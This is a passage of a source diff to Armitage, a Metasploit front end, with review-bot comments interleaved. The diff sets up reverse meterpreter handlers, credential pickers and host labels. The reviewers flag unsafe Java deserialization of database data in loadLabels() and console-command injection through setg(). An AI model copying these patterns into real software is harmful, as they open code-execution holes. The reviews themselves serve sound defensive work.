$2"); } sub readg { 
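Review bot: The `while ($lhost eq "")` loop added to main() in the -81,8 hunk exits only on a reply that starts with `LHOST => `, so a server with LHOST unset, or a read that returns other console text first, leaves Cortana polling once a second forever with console `$c` never released. Bound it, e.g. `while ($lhost eq "" && $tries < 30) {` with `$tries = $tries + 1;` after the `sleep(1000);`, add `$tries` to the `local(...)` list, and release the console and report an error when `$lhost` is still empty. `substr(["$temp" trim], 9)` also keeps everything after the prefix, so if one read returns more than one line the extra text ends up in the value handed to `passObjects`; keeping only the first line would be safer. The allocate/write/release sequence in the -42,8 hunk releases the console without reading from it, so it is worth confirming that the `setg LPORT` write is processed before the release. main() starts and ends outside these hunks.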
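Review bot: `cmd_safe("setg $1 $2")` in setg() builds a console command by string interpolation, so a name or value containing a line break is sent as an additional console command; the `core.setg` RPC call it replaces took the two as separate arguments. If scripts can pass values that originate from hosts or user input, reject line breaks before building the command, e.g. `if ("\n" isin "$1 $2" || "\r" isin "$1 $2") { return; }`, and extend the `# setg("varname", "value")` comment to say that both arguments must be single-line. `cmd_safe` is defined outside this hunk, so whether it already filters its input cannot be confirmed from here.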
@@ -335,14 +335,22 @@ sub multi_handler { } sub handler { - local('%o $3'); - if ($3) { - %o = copy($3); - } + local('%o $3 $key $value'); - %o['PAYLOAD'] = "payload/ $+ $1"; + # default options + %o['PAYLOAD'] = $1; %o['LPORT'] = $2; + %o['DisablePayloadHandler'] = 'false'; + %o['ExitOnSession'] = 'false'; + + # let the user override anything + if ($3) { + foreach $key => $value ($3) { + %o[$key] = $value; + } + } + # make sure LHOST is correct if ('LHOST' !in %o) { if ("*http*" iswm $1) { %o['LHOST'] = lhost(); @@ -352,6 +360,7 @@ sub handler { } } + # let's do it... return launch('exploit', 'multi/handler', %o); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index 2cf69a9a9754..fe2af9a9ecbc 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -59,7 +59,7 @@ sub showHost { else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) { push(@overlay, 'resources/windowsxp.png'); } - else if ("*8*" iswm $match) { + else if ("*8*" iswm $match && "*2008*" !iswm $match) { push(@overlay, 'resources/windows8.png'); } else { @@ -139,7 +139,7 @@ sub _connectToMetasploit { $progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100]; # keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose. - $REMOTE = iff($1 eq "127.0.0.1", $null, 1); + $REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1); $flag = 10; while ($flag) { @@ -160,7 +160,7 @@ sub _connectToMetasploit { } # connecting locally? go to Metasploit directly... - if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") { + if ($REMOTE is $null) { $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug]; $aclient = [new RpcAsync: $client]; $mclient = $client; 
@@ -239,10 +239,6 @@ sub _connectToMetasploit { [$progress setNote: "Connected: ..."]; [$progress setProgress: 60]; - if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') { - showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server."); - } - dispatchEvent(&postSetup); }, \$progress)); } diff --git a/external/source/armitage/scripts/attacks.sl b/external/source/armitage/scripts/attacks.sl index 4940fb4474e5..9fa13c9902d3 100644 --- a/external/source/armitage/scripts/attacks.sl +++ b/external/source/armitage/scripts/attacks.sl @@ -679,12 +679,20 @@ sub addFileListener { $actions["SigningCert"] = $actions["*FILE*"]; $actions["SigningKey"] = $actions["*FILE*"]; $actions["Wordlist"] = $actions["*FILE*"]; + $actions["EXE::Custom"] = $actions["*FILE*"]; + $actions["EXE::Template"] = $actions["*FILE*"]; $actions["WORDLIST"] = $actions["*FILE*"]; $actions["REXE"] = $actions["*FILE*"]; # set up an action to choose a session $actions["SESSION"] = lambda(&chooseSession); + # helpers to set credential pairs from database... yay? + $actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + $actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + # set up an action to pop up a file chooser for different file type values. $actions["RHOST"] = { local('$title $temp'); diff --git a/external/source/armitage/scripts/gui.sl b/external/source/armitage/scripts/gui.sl index da5f974c100b..7f7f155f8828 100644 --- a/external/source/armitage/scripts/gui.sl +++ b/external/source/armitage/scripts/gui.sl 
@@ -446,7 +446,7 @@ sub quickListDialog { $button = [new JButton: $2]; [$button addActionListener: lambda({ - [$callback : [$model getSelectedValueFromColumn: $table, $lead]]; + [$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model]; [$dialog setVisible: 0]; }, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])]; diff --git a/external/source/armitage/scripts/jobs.sl b/external/source/armitage/scripts/jobs.sl index fc30868be77e..603f8ccf1b23 100644 --- a/external/source/armitage/scripts/jobs.sl +++ b/external/source/armitage/scripts/jobs.sl @@ -16,47 +16,7 @@ import java.awt.event.*; import ui.*; sub manage_proxy_server { - manage_job("Auxiliary: server/socks4a", - # start server function - { - launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null); - }, - # description of job (for job kill function) - { - local('$host $port'); - ($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT")); - return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?"; - } - ); - -} - -sub report_url { - find_job($name, { - if ($1 == -1) { - showError("Server not found"); - } - else { - local('$job $host $port $uripath'); - $job = call($client, "job.info", $1); - - ($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT")); - $uripath = $job["info"]["uripath"]; - - local('$dialog $text $ok'); - $dialog = dialog("Output", 320, 240); - $text = [new JTextArea]; - [$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"]; - - $button = [new JButton: "Ok"]; - [$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)]; - - [$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]]; - [$dialog add: center($button), [BorderLayout SOUTH]]; - - [$dialog setVisible: 1]; - } - }); + launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1); } sub find_job { 
@@ -80,26 +40,6 @@ sub find_job { }, $name => $1, $function => $2)); } -# manage_job(job name, { start job function }, { job dialog info }) -sub manage_job { - local('$name $startf $stopf'); - ($name, $startf, $stopf) = @_; - - find_job($name, lambda({ - if ($1 == -1) { - [$startf]; - } - else { - local('$job $confirm $foo $confirm'); - $job = call($client, "job.info", $1); - $confirm = askYesNo([$stopf : $1, $job], "Stop Job"); - if ($confirm eq "0") { - call_async($client, "job.stop", $1); - } - } - }, \$startf, \$stopf)); -} - sub generatePayload { local('$file'); $file = saveFile2(); @@ -450,6 +390,11 @@ sub _launch_dialog { elog("launched DNS enum for $domain"); } } + else if ($type eq "auxiliary" && $command eq "server/socks4a") { + local('$host $port'); + ($host, $port) = values($options, @('SRVHOST', 'SRVPORT')); + elog("started SOCKS proxy server at $host $+ : $+ $port"); + } launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]); } diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index 7c70ba2d6285..59cd3c514382 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl 
@@ -54,6 +54,29 @@ sub host_selected_items { item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista")); item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8")); + item($h, "Set Label...", 'S', lambda({ + # calculate preexisting label to prompt with + local('$label %l $host'); + + # get a label + foreach $host ($hosts) { + if ($label eq "") { + $label = getHostLabel($host); + } + } + + # ask for a label + $label = ask("Set label to:", $label); + if ($label !is $null) { + foreach $host ($hosts) { + %l[$host] = ["$label" trim]; + } + call_async($mclient, "db.report_labels", %l); + } + }, $hosts => $2)); + + separator($h); + item($h, "Remove Host", 'R', clearHostFunction($2)); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index 19feb846c31e..ad9f68ce6ac7 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl 
@@ -372,3 +372,34 @@ sub launchBruteForce { [$console start]; }, $type => $1, $module => $2, $options => $3, $title => $4)); } + +sub credentialHelper { + thread(lambda({ + [Thread yield]; + + # gather our credentials please + local('$creds $cred @creds'); + $creds = call($mclient, "db.creds2", [new HashMap])["creds2"]; + foreach $cred ($creds) { + if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") { + push(@creds, $cred); + } + } + + # pop up a dialog to let the user choose their favorite set + quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({ + if ($1 eq "") { + return; + } + + local('$user $pass'); + $user = [$3 getSelectedValueFromColumn: $2, 'user']; + $pass = [$3 getSelectedValueFromColumn: $2, 'pass']; + + [$model setValueForKey: $USER, "Value", $user]; + [$model setValueForKey: $PASS, "Value", $pass]; + [$model fireListeners]; + }, \$callback, \$model, \$USER, \$PASS)); + }, \$USER, \$PASS, \$model, $callback => $4)); +} + diff --git a/external/source/armitage/scripts/server.sl b/external/source/armitage/scripts/server.sl index 78f9738dbba7..1ea04e9671e6 100644 --- a/external/source/armitage/scripts/server.sl +++ b/external/source/armitage/scripts/server.sl @@ -403,9 +403,6 @@ sub main { # we need this global to be set so our reverse listeners work as expected. $MY_ADDRESS = $host; - # make sure clients know a team server is present. can't happen async. - call($client, "core.setg", "ARMITAGE_TEAM", '1'); - # # setup the client cache # diff --git a/external/source/armitage/scripts/targets.sl b/external/source/armitage/scripts/targets.sl index 7929dac69635..3721006ea7d3 100644 --- a/external/source/armitage/scripts/targets.sl +++ b/external/source/armitage/scripts/targets.sl 
@@ -21,6 +21,10 @@ sub getHostOS { return iff($1 in %hosts, %hosts[$1]['os_name'], $null); } +sub getHostLabel { + return iff($1 in %hosts, %hosts[$1]['label'], $null); +} + sub getSessions { return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']); } @@ -122,7 +126,7 @@ on sessions { } if ($host['show'] eq "1") { - push(@nodes, @($id, describeHost($host), showHost($host), $tooltip)); + push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip)); } } @@ -130,14 +134,14 @@ on sessions { } sub refreshGraph { - local('$node $id $description $icons $tooltip $highlight'); + local('$node $id $label $description $icons $tooltip $highlight'); # update everything... [$graph start]; # do the hosts? foreach $node (@nodes) { - ($id, $description, $icons, $tooltip) = $node; - [$graph addNode: $id, $description, $icons, $tooltip]; + ($id, $label, $description, $icons, $tooltip) = $node; + [$graph addNode: $id, $label, $description, $icons, $tooltip]; } # update the routes diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index ceed745950e1..de80e1d8d343 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -159,12 +159,15 @@ sub setg { } sub createDefaultHandler { - warn("Creating a default reverse handler..."); # setup a handler for meterpreter - setg("LPORT", randomPort()); + local('$port'); + $port = randomPort(); + setg("LPORT", $port); + warn("Creating a default reverse handler... 0.0.0.0: $+ $port"); call_async($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", + LPORT => $port, ExitOnSession => "false" )); } 
@@ -307,7 +310,12 @@ sub startMetasploit { savePreferences(); } - $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + if ("*apps*pro*" iswm $msfdir) { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null]; + } + else { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + } $data = join("\r\n", readAll($handle, -1)); closef($handle); @@ -416,7 +424,7 @@ sub connectDialog { [$dialog setVisible: 0]; connectToMetasploit($h, $p, $u, $s); - if ($h eq "127.0.0.1" || $h eq "localhost") { + if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") { try { closef(connect("127.0.0.1", $p, 1000)); } diff --git a/external/source/armitage/scripts/workspaces.sl b/external/source/armitage/scripts/workspaces.sl index 90c1210b50dd..5a45900654f9 100644 --- a/external/source/armitage/scripts/workspaces.sl +++ b/external/source/armitage/scripts/workspaces.sl @@ -33,7 +33,7 @@ sub listWorkspaces { $dialog = [new JPanel]; [$dialog setLayout: [new BorderLayout]]; - ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @()); + ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @()); updateWorkspaceList($table, $model); [$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]]; 
@@ -88,15 +88,16 @@ sub workspaceDialog { local('$table $model'); ($table, $model) = $2; - local('$dialog $name $host $ports $os $button $session'); + local('$dialog $name $host $ports $os $button $session $label'); $dialog = dialog($title, 640, 480); - [$dialog setLayout: [new GridLayout: 6, 1]]; + [$dialog setLayout: [new GridLayout: 7, 1]]; $name = [new ATextField: $1['name'], 16]; [$name setEnabled: $enable]; $host = [new ATextField: $1['hosts'], 16]; $ports = [new ATextField: $1['ports'], 16]; $os = [new ATextField: $1['os'], 16]; + $label = [new ATextField: $1['labels'], 16]; $session = [new JCheckBox: "Hosts with sessions only"]; if ($1['session'] eq 1) { [$session setSelected: 1]; @@ -108,6 +109,7 @@ sub workspaceDialog { [$dialog add: label_for("Hosts:", 60, $host)]; [$dialog add: label_for("Ports:", 60, $ports)]; [$dialog add: label_for("OS:", 60, $os)]; + [$dialog add: label_for("Labels:", 60, $label)]; [$dialog add: $session]; [$dialog add: center($button)]; @@ -116,15 +118,16 @@ sub workspaceDialog { [$button addActionListener: lambda({ # yay, we have a dialog... - local('$n $h $p $o $s @workspaces $ws $temp'); + local('$n $h $p $o $s $l @workspaces $ws $temp'); $n = [[$name getText] trim]; $h = [strrep([$host getText], '*', '%', '?', '_') trim]; $p = [[$ports getText] trim]; $o = [strrep([$os getText], '*', '%', '?', '_') trim]; + $l = [[$label getText] trim]; $s = [$session isSelected]; # save the new menu - $ws = workspace($n, $h, $p, $o, $s); + $ws = workspace($n, $h, $p, $o, $s, $l); @workspaces = workspaces(); foreach $temp (@workspaces) { if ($temp["name"] eq $n) { @@ -140,7 +143,7 @@ sub workspaceDialog { updateWorkspaceList($table, $model); [$dialog setVisible: 0]; - }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)]; + }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)]; } sub reset_workspace { 
@@ -199,16 +202,16 @@ sub set_workspace { } sub workspace { - return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5); + return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6); } sub workspaces { - local('$ws @r $name $host $port $os $session $workspace'); + local('$ws @r $name $host $port $os $session $workspace $label'); $ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]); foreach $workspace ($ws) { if ($workspace ne "") { - ($name, $host, $port, $os, $session) = split('@@', $workspace); - push(@r, workspace($name, $host, $port, $os, $session)); + ($name, $host, $port, $os, $session, $label) = split('@@', $workspace); + push(@r, workspace($name, $host, $port, $os, $session, $label)); } } return @r; diff --git a/external/source/armitage/src/armitage/ArmitageApplication.java b/external/source/armitage/src/armitage/ArmitageApplication.java index aec7602dd01b..b7365e1309ab 100644 --- a/external/source/armitage/src/armitage/ArmitageApplication.java +++ b/external/source/armitage/src/armitage/ArmitageApplication.java @@ -196,6 +196,7 @@ public void popAppTab(Component tab) { r.setLayout(new BorderLayout()); r.add(t.component, BorderLayout.CENTER); r.pack(); + t.component.validate(); r.addWindowListener(new WindowAdapter() { public void windowClosing(WindowEvent ev) { diff --git a/external/source/armitage/src/cortana/Loader.java b/external/source/armitage/src/cortana/Loader.java index a0a8a8c3c065..d5c76d836df0 100644 --- a/external/source/armitage/src/cortana/Loader.java +++ b/external/source/armitage/src/cortana/Loader.java @@ -15,7 +15,7 @@ public class Loader implements Loadable { protected ScriptLoader loader; protected Hashtable shared = new Hashtable(); protected ScriptVariables vars = new ScriptVariables(); - protected Object[] passMe = new Object[2]; + protected Object[] passMe = new Object[3]; protected List scripts = new LinkedList(); public void unsetDebugLevel(int flag) { 
@@ -51,10 +51,11 @@ public boolean isReady() { } } - public void passObjects(Object o, Object p) { + public void passObjects(Object o, Object p, Object q) { synchronized (this) { passMe[0] = o; passMe[1] = p; + passMe[2] = q; } } diff --git a/external/source/armitage/src/cortana/Main.java b/external/source/armitage/src/cortana/Main.java index be70944f5d2e..be04c511a31e 100644 --- a/external/source/armitage/src/cortana/Main.java +++ b/external/source/armitage/src/cortana/Main.java @@ -69,7 +69,7 @@ public void start(String host, String port, String user, String pass, String nic try { Object conns[] = setupConnections(host, port, user, pass, nick); //new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false); - engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host); + engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]); new Thread(this).start(); } catch (java.lang.RuntimeException rex) { diff --git a/external/source/armitage/src/graph/NetworkGraph.java b/external/source/armitage/src/graph/NetworkGraph.java index fa9b0e7eef5a..d15d67b3acc5 100644 --- a/external/source/armitage/src/graph/NetworkGraph.java +++ b/external/source/armitage/src/graph/NetworkGraph.java 
@@ -453,17 +453,26 @@ public void setRoutes(Route[] routes) { protected Map tooltips = new HashMap(); - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { nodeImages.put(id, image); + if (label.length() > 0) { + if (description.length() > 0) { + description += "\n" + label; + } + else { + description = label; + } + } + mxCell cell; if (!nodes.containsKey(id)) { - cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97); + cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97); nodes.put(id, cell); } else { cell = (mxCell)nodes.get(id); - cell.setValue(label); + cell.setValue(description); } nodes.touch(id); diff --git a/external/source/armitage/src/msf/DatabaseImpl.java b/external/source/armitage/src/msf/DatabaseImpl.java index ba7b330d590c..ff00d4d877df 100644 --- a/external/source/armitage/src/msf/DatabaseImpl.java +++ b/external/source/armitage/src/msf/DatabaseImpl.java @@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection { protected String workspaceid = "0"; protected String hFilter = null; protected String sFilter = null; + protected String[] lFilter = null; protected Route[] rFilter = null; protected String[] oFilter = null; protected int hindex = 0; protected int sindex = 0; + /* keep track of labels associated with each host */ + protected Map labels = new HashMap(); + /* define the maximum hosts in a workspace */ protected int maxhosts = 512; @@ -135,6 +139,20 @@ private boolean checkRoute(String address) { return false; } + private boolean checkLabel(String host) { + if (!labels.containsKey(host)) + return false; + + String label_l = (labels.get(host) + "").toLowerCase(); + + for (int x = 0; x < lFilter.length; x++) { + if (label_l.indexOf(lFilter[x]) != -1) { + return true; + } + } + return false; + } + private boolean checkOS(String os) { String os_l = os.toLowerCase(); 
@@ -145,11 +163,76 @@ private boolean checkOS(String os) { return false; } + protected void loadLabels() { + try { + /* query database for label data */ + List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'"); + if (rows.size() == 0) + return; + + /* extract our BASE64 encoded data */ + String data = ((Map)rows.get(0)).get("data") + ""; + System.err.println("Read: " + data.length() + " bytes"); + + /* turn our data into raw data */ + byte[] raw = Base64.decode(data); + + /* deserialize our notes data */ + ByteArrayInputStream store = new ByteArrayInputStream(raw); + ObjectInputStream handle = new ObjectInputStream(store); + Map temp = (Map)(handle.readObject()); + handle.close(); + store.close(); + + /* merge with our new map */ + labels.putAll(temp); + } + catch (Exception ex) { + ex.printStackTrace(); + } + } + + protected void mergeLabels(Map l) { + /* accept any label values and merge them into our global data set */ + Iterator i = l.entrySet().iterator(); + while (i.hasNext()) { + Map.Entry entry = (Map.Entry)i.next(); + if ("".equals(entry.getValue())) { + labels.remove(entry.getKey() + ""); + } + else { + labels.put(entry.getKey() + "", entry.getValue() + ""); + } + } + } + + /* add labels to our hosts */ + public List addLabels(List rows) { + if (labels.size() == 0) + return rows; + + Iterator i = rows.iterator(); + while (i.hasNext()) { + Map entry = (Map)i.next(); + String address = (entry.containsKey("address") ? 
entry.get("address") : entry.get("host")) + ""; + if (labels.containsKey(address)) { + entry.put("label", labels.get(address) + ""); + } + else { + entry.put("label", ""); + } + } + + return rows; + } + public List filterByRoute(List rows, int max) { - if (rFilter != null || oFilter != null) { + if (rFilter != null || oFilter != null || lFilter != null) { Iterator i = rows.iterator(); while (i.hasNext()) { Map entry = (Map)i.next(); + + /* make sure the address is within a route we care about */ if (rFilter != null && entry.containsKey("address")) { if (!checkRoute(entry.get("address") + "")) { i.remove(); @@ -163,9 +246,26 @@ else if (rFilter != null && entry.containsKey("host")) { } } + /* make sure the host is something we care about too */ if (oFilter != null && entry.containsKey("os_name")) { - if (!checkOS(entry.get("os_name") + "")) + if (!checkOS(entry.get("os_name") + "")) { + i.remove(); + continue; + } + } + + /* make sure the host has the right label */ + if (lFilter != null && entry.containsKey("address")) { + if (!checkLabel(entry.get("address") + "")) { + i.remove(); + continue; + } + } + else if (lFilter != null && entry.containsKey("host")) { + if (!checkLabel(entry.get("host") + "")) { i.remove(); + continue; + } } } @@ -180,6 +280,7 @@ else if (rFilter != null && entry.containsKey("host")) { public void connect(String dbstring, String user, String password) throws Exception { db = DriverManager.getConnection(dbstring, user, password); setWorkspace("default"); + loadLabels(); } public Object execute(String methodName) throws IOException { 
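Review bot: `loadLabels()` in DatabaseImpl passes the `data` column of a `notes` row straight to `ObjectInputStream.readObject()`, so whoever can write that row controls the object graph every connecting client deserializes. The cast to `Map` happens only after those objects have been constructed, and native Java deserialization of data from a shared store is a well-known code-execution risk. The labels are a flat string-to-string map, so they can be stored as encoded text lines and parsed without any object stream, as sketched below. The writer in the `db.report_labels` hunk has to emit the same format and strip tabs and newlines from labels. If the serialized format must stay, set an allow-list `ObjectInputFilter` on `handle` before `readObject()`.

```java
protected void loadLabels() {
	try {
		// … unchanged: query notes for ntype 'armitage.labels', return if no rows …

		/* labels are stored as BASE64 of UTF-8 "address<TAB>label" lines; nothing is deserialized */
		String data = ((Map)rows.get(0)).get("data") + "";
		String text = new String(Base64.decode(data), "UTF-8");

		Map temp = new HashMap();
		String[] lines = text.split("\n");
		for (int x = 0; x < lines.length; x++) {
			int tab = lines[x].indexOf('\t');
			if (tab > 0)
				temp.put(lines[x].substring(0, tab), lines[x].substring(tab + 1));
		}

		/* merge with our new map */
		labels.putAll(temp);
	}
	// … unchanged: catch block …
```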
@@ -192,8 +293,8 @@ protected Map build() { /* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting and limit the size of the final result there. */ - int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000; - int limit2 = rFilter == null && oFilter == null ? maxservices : 100000; + int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000; + int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000; temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid); @@ -235,7 +336,7 @@ public Object execute(String methodName, Object[] params) throws IOException { result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices)); } else if (methodName.equals("db.hosts")) { - result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts)); + result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts))); } else { result.put(methodName.substring(3), executeQuery(query)); @@ -332,6 +433,7 @@ else if (methodName.equals("db.filter")) { rFilter = null; oFilter = null; + lFilter = null; List hosts = new LinkedList(); List srvcs = new LinkedList(); @@ -385,6 +487,11 @@ else if (methodName.equals("db.filter")) { oFilter = (values.get("os") + "").toLowerCase().split(",\\s*"); } + /* label filter */ + if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) { + lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*"); + } + if (hosts.size() == 0) { hFilter = null; } 
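Review bot: In the `db.filter` hunk, `(values.get("labels") + "")` turns a key that is present with a null value into the string "null", which passes the `length() > 0` test and sets `lFilter` to `{"null"}`, hiding every host whose label does not contain that text. The case looks reachable: workspaces saved before this change have five `@@` fields, so `workspaces()` in workspaces.sl leaves `$label` unset while `workspace()` still adds a `labels` key. Whether that arrives here as Java null depends on the RPC marshalling, which the diff does not show. Test the value before stringifying it: `Object l = values.get("labels"); if (l != null && l.toString().length() > 0) { lFilter = l.toString().toLowerCase().split(",\\s*"); }`. The enclosing `execute` method starts and ends outside the hunk.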
@@ -406,6 +513,31 @@ else if (methodName.equals("db.fix_creds")) { result.put("rows", new Integer(stmt.executeUpdate())); return result; } + else if (methodName.equals("db.report_labels")) { + /* merge out global label data */ + Map values = (Map)params[0]; + mergeLabels(values); + + /* delete our saved label data */ + executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'"); + + /* serialize our notes data */ + ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128); + ObjectOutputStream handle = new ObjectOutputStream(store); + handle.writeObject(labels); + handle.close(); + store.close(); + + String data = Base64.encode(store.toByteArray()); + + /* save our label data */ + PreparedStatement stmt = null; + stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)"); + stmt.setString(1, data); + stmt.executeUpdate(); + + return new HashMap(); + } else if (methodName.equals("db.report_host")) { Map values = (Map)params[0]; String host = values.get("host") + ""; diff --git a/external/source/armitage/src/msf/RpcCacheImpl.java b/external/source/armitage/src/msf/RpcCacheImpl.java index c28e037e91b2..4a1d7e85cb3f 100644 --- a/external/source/armitage/src/msf/RpcCacheImpl.java +++ b/external/source/armitage/src/msf/RpcCacheImpl.java @@ -106,6 +106,8 @@ private static String cacheKey(String method, Object[] args) { key.append(temp.get("ports")); key.append(";"); key.append(temp.get("session")); + key.append(";"); + key.append(temp.get("labels")); return key.toString(); } diff --git a/external/source/armitage/src/table/NetworkTable.java b/external/source/armitage/src/table/NetworkTable.java index 014fed3a101e..2d7590db0e13 100644 --- a/external/source/armitage/src/table/NetworkTable.java +++ b/external/source/armitage/src/table/NetworkTable.java 
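Review bot: The `db.report_labels` branch deletes the stored labels row and then inserts the replacement as two independent statements, so an exception between them leaves the `notes` table with no labels at all. If more than one DatabaseImpl instance shares the database, each one also writes back its own in-memory `labels` map and silently drops labels another instance stored after this one's `loadLabels()`. Run both statements in one transaction (`db.setAutoCommit(false)` before the delete, `db.commit()` after the insert) and re-read the stored row before merging. `stmt` is never closed; add `stmt.close();` after `stmt.executeUpdate();`. The enclosing `execute` method starts and ends outside the hunk.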
@@ -52,7 +52,7 @@ public NetworkTable() { public NetworkTable(Properties display) { this.display = display; - model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256); + model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256); table = new ATable(model); TableRowSorter sorter = new TableRowSorter(model); sorter.toggleSortOrder(1); @@ -79,12 +79,13 @@ public boolean equals(Object a, Object b) { }; sorter.setComparator(1, hostCompare); - sorter.setComparator(3, hostCompare); + sorter.setComparator(4, hostCompare); table.setRowSorter(sorter); table.setColumnSelectionAllowed(false); table.getColumn("Address").setPreferredWidth(125); + table.getColumn("Label").setPreferredWidth(125); table.getColumn("Pivot").setPreferredWidth(125); table.getColumn(" ").setPreferredWidth(32); table.getColumn(" ").setMaxWidth(32); @@ -95,7 +96,7 @@ public boolean equals(Object a, Object b) { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col); - if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { + if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { component.setFont(component.getFont().deriveFont(Font.BOLD)); } else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) { 
@@ -252,16 +253,17 @@ public void setAutoLayout(String layout) { public void addActionForKeySetting(String key, String dvalue, Action action) { } - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { if (id == null || label == null) return null; HashMap map = new HashMap(); map.put("Address", id); - if (label.indexOf(id) > -1) - label = label.substring(id.length()); - map.put("Description", label); + if (description.indexOf(id) > -1) + description = description.substring(id.length()); + map.put("Label", label); + map.put("Description", description); map.put("Tooltip", tooltip); map.put("Image", image); map.put(" ", tooltip); diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index bc1569659cb7..ce80216dbd8d 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -26,6 +26,12 @@ public static TableCellRenderer getDefaultTableRenderer(final JTable table, fina specialitems.add("WORDLIST"); specialitems.add("SESSION"); specialitems.add("REXE"); + specialitems.add("EXE::Custom"); + specialitems.add("EXE::Template"); + specialitems.add("USERNAME"); + specialitems.add("PASSWORD"); + 